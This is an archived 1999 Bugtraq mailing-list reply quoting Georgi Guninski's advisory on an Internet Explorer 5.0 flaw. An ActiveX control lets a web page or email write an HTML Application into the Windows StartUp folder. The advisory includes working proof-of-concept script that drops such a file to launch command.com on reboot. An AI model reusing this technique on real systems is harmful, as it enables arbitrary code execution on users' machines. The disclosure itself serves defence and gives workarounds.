This apparently works on NT 4.0 sp5 and IE 5.00.2014.0216IC as well.. Micheal Patterson pattersonmat_private ----- Original Message ----- From: Georgi Guninski <joroat_private> To: <BUGTRAQat_private> Sent: Saturday, August 21, 1999 11:17 AM Subject: IE 5.0 allows executing programs > Disclaimer: > The opinions expressed in this advisory and program are my own and not > of any company. > The usual standard disclaimer applies, especially the fact that Georgi > Guninski > is not liable for any damages caused by direct or indirect use of the > information or functionality provided by this program. > Georgi Guninski, bears NO responsibility for content or misuse of this > program or any derivatives thereof. > > Description: > > Internet Explorer 5.0 under Windows 95/98 (do not know about NT) > allows executing arbitrary programs on the local machine by creating and > overwriting local files and putting content in them. > > Details: > > The problem is the ActiveX Control "Object for constructing type > libraries for scriptlets". > It allows creating and overwriting local files, and more putting content > in them. > There is some unneeded information in the file, but part of the content > may be chosen. > So, an HTML Application file may be created, feeded with an exploit > information and written to the StartUp folder. > The next time the user reboots (which may be forced), the code in the > HTML Application file will be executed. > This vulnerability can be exploited via email. > > Demonstration is available at: http://www.nat.bg/~joro/scrtlb.html > > Workaround: > Disable Active Scripting > or > Disable Run ActiveX Controls and plug-ins > > The code is: > > <object id="scr" > classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" > > > </object> > <SCRIPT> > scr.Reset(); > scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta"; > scr.Doc="<object id='wsh' > classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert( 'Written > by Georgi Guninski > http://www.nat.bg/~joro');wsh.Run('c:\\command.com');</"+"SCRIPT>"; > scr.write(); > </SCRIPT> > </object> > > Regards, > Georgi Guninski > http://www.nat.bg/~joro >
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:57:59 PDT